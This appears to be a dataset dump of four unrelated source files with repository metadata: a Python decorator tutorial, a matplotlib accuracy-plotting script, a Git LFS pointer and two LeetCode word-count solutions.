a806892617cccf3028b5001dfe9ff1c763831907 | 426f216e3d38d2030d337c8be6463cc4cd7af6c3 | /day04/decrator/main1.py | 14d6df4ce8c267532c3ae30ace6b10d6f046ab7d | [
"Apache-2.0"
] | permissive | zhangyage/Python-oldboy | c7b43801935fc9e08e973ee0b852daa8e8667fb7 | a95c1b465929e2be641e425fcb5e15b366800831 | refs/heads/master | 2021-01-23T02:59:37.574638 | 2019-10-27T05:35:58 | 2019-10-27T05:35:58 | 86,039,220 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
'''
装饰器学习
装饰器可以在我们为函数批量添加功能时候节省我们的工作量
'''
#装饰器函数
def outer(fun):
def wrapper(arg): #传递参数
print '验证' #在这里加入一行,在我们再次执行函数的时候就可以在多输出这一喊
reslute1 = fun(arg)
return reslute1 #这样使用可以是我们的函数带有返回值
print '就是这样做的'
return wrapper
@outer #和装饰器函数建立关系
def Func1(arg):
print 'func1',arg
return '返回在什么位置呢?'
respone = Func1('test')
print respone
| [
"zhangyage2015@163.com"
] | zhangyage2015@163.com |
db04af0f0c67badbff86956e43c7929a80ba4e8d | 11b420a9e6dbe371167227f41ef8e344e3382612 | /ConvNets/FINAL_Averaged_Experiments/ALL_RESULTS/ANALYSIS/Non_Linearity/Accuracy.py | b5403cb764d9b69b01bfad217db65070766d85f5 | [
"MIT"
] | permissive | tarek-ullah/Active-Learning-Bayesian-Convolutional-Neural-Networks | 7092386758b68dc922efaa2c2eba055930bf2896 | f8b68038bd3b97c473e9c1de6b6cdee4538021f4 | refs/heads/master | 2021-01-13T06:57:19.343775 | 2016-11-02T12:22:16 | 2016-11-02T12:22:16 | 81,338,773 | 1 | 0 | null | 2017-02-08T14:34:15 | 2017-02-08T14:34:15 | null | UTF-8 | Python | false | false | 1,230 | py | # http://www.scipy-lectures.org/intro/matplotlib/matplotlib.html
import numpy as np
import matplotlib.pyplot as plt
from pylab import *
from matplotlib import rc, rcParams
import matplotlib.dates as dates
# activate latex text rendering
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('font', weight='bold')
rcParams['text.latex.preamble'] = [r'\usepackage{sfmath} \boldmath']
Linear = np.load('Linear.npy')
ReLU = np.load('ReLU.npy')
Sigmoid = np.load('Sigmoid.npy')
TanH = np.load('TanH.npy')
Queries = np.arange(100, 1010, 10)
plt.figure(figsize=(12, 8), dpi=80)
plt.plot(Queries, Linear, color="red", linewidth=3.0, marker='x', label=r"\textbf{Linear}" )
plt.plot(Queries, ReLU, color="blue", linewidth=3.0, marker='x', label=r"\textbf{ReLU}" )
plt.plot(Queries, Sigmoid, color="black", linewidth=3.0, marker='x', label=r"\textbf{Sigmoid}" )
plt.plot(Queries, TanH, color="green", linewidth=3.0, marker='x', label=r"\textbf{TanH}" )
plt.xlabel(r'\textbf{Number of Labelled Samples}')
plt.ylabel(r'\textbf{Accuracy on Test Set}')
plt.title(r'\textbf{Signnificance of Non-Linearity in Bayesian ConvNet}')
plt.grid()
# Set x limits
# plt.xlim(1000.0, 10000.0)
# plt.ylim(0.8, 1.0)
plt.legend(loc = 4)
plt.show()
| [
"riashat.islam.93@gmail.com"
] | riashat.islam.93@gmail.com |
3cbba942bb011ade06f464f83e1eb6dd2f492c8e | 1fe8d4133981e53e88abf633046060b56fae883e | /venv/lib/python3.8/site-packages/tensorboard/compat/tensorflow_stub/flags 2.py | 769d1d5906e07cbbd043ad36316e3cfd2f9bfbf2 | [] | no_license | Akira331/flask-cifar10 | 6c49db8485038731ce67d23f0972b9574746c7a7 | 283e7a2867c77d4b6aba7aea9013bf241d35d76c | refs/heads/master | 2023-06-14T16:35:06.384755 | 2021-07-05T14:09:15 | 2021-07-05T14:09:15 | 382,864,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:8a51fcd6ca1170457f8161558624e113316ceaa217471a9e1325b2a82eb7c143
size 4235
| [
"business030301@gmail.com"
] | business030301@gmail.com |
b0e9ba0e3c917b392dd5109b88a13eb5eaacb52d | 72b77f97876983025eb05a5aa1d6f248a1be3074 | /count_words_obtained_after_adding_a_letter.py | 78069c6fffd0c81de8f3de2f4b842aeb3fabdf91 | [
"Apache-2.0"
] | permissive | erjan/coding_exercises | 4c6bccb2cdac65ccbc3107a482914275ecd157f7 | 68dac358a6d4dabd41d47dbd4addb2ec50e0ca11 | refs/heads/master | 2023-09-02T07:25:30.886175 | 2023-08-27T06:13:06 | 2023-08-27T06:13:06 | 236,281,070 | 5 | 0 | Apache-2.0 | 2020-05-05T15:08:49 | 2020-01-26T07:32:09 | Python | UTF-8 | Python | false | false | 2,824 | py | '''
You are given two 0-indexed arrays of strings startWords and targetWords. Each string consists of lowercase English letters only.
For each string in targetWords, check if it is possible to choose a string from startWords and perform a conversion operation on it to be equal to that from targetWords.
The conversion operation is described in the following two steps:
Append any lowercase letter that is not present in the string to its end.
For example, if the string is "abc", the letters 'd', 'e', or 'y' can be added to it, but not 'a'. If 'd' is added, the resulting string will be "abcd".
Rearrange the letters of the new string in any arbitrary order.
For example, "abcd" can be rearranged to "acbd", "bacd", "cbda", and so on. Note that it can also be rearranged to "abcd" itself.
Return the number of strings in targetWords that can be obtained by performing the operations on any string of startWords.
Note that you will only be verifying if the string in targetWords can be obtained from a string in startWords by performing the operations. The strings in startWords do not actually change during this process.
'''
class Solution:
def wordCount(self, startWords: List[str], targetWords: List[str]) -> int:
starts, ans = set(), 0
ans = 0
for word in startWords:
starts.add(''.join(sorted(word)))
for word in targetWords:
for i in range(len(word)):
if ''.join(sorted(word[:i] + word[i+1:])) in starts:
ans += 1
break
return ans
----------------------------------------------------------------------------------------
class Solution:
def wordCount(self, startWords: List[str], targetWords: List[str]) -> int:
# Sort each start word and add it to a hash set
startWords_sorted = set()
# O(S*26*log(26))
for word in startWords:
startWords_sorted.add("".join(sorted(list(word))))
# sort each target word and add it to a list
# O(T*26*log(26))
targetWords_sorted = []
for word in targetWords:
targetWords_sorted.append(sorted(list(word)))
# for each sorted target word, we remove a single character and
# check if the resulting word is in the startWords_sorted
# if it is, we increment cnt and break the inner loop
# otherwise we keep removing until we either find a hit or reach the
# end of the string
# O(T*26) = O(T)
cnt = 0
for target in targetWords_sorted:
for i in range(len(target)):
w = target[:i] + target[i+1:]
w = "".join(w)
if w in startWords_sorted:
cnt += 1
break
return cnt
| [
"noreply@github.com"
] | erjan.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.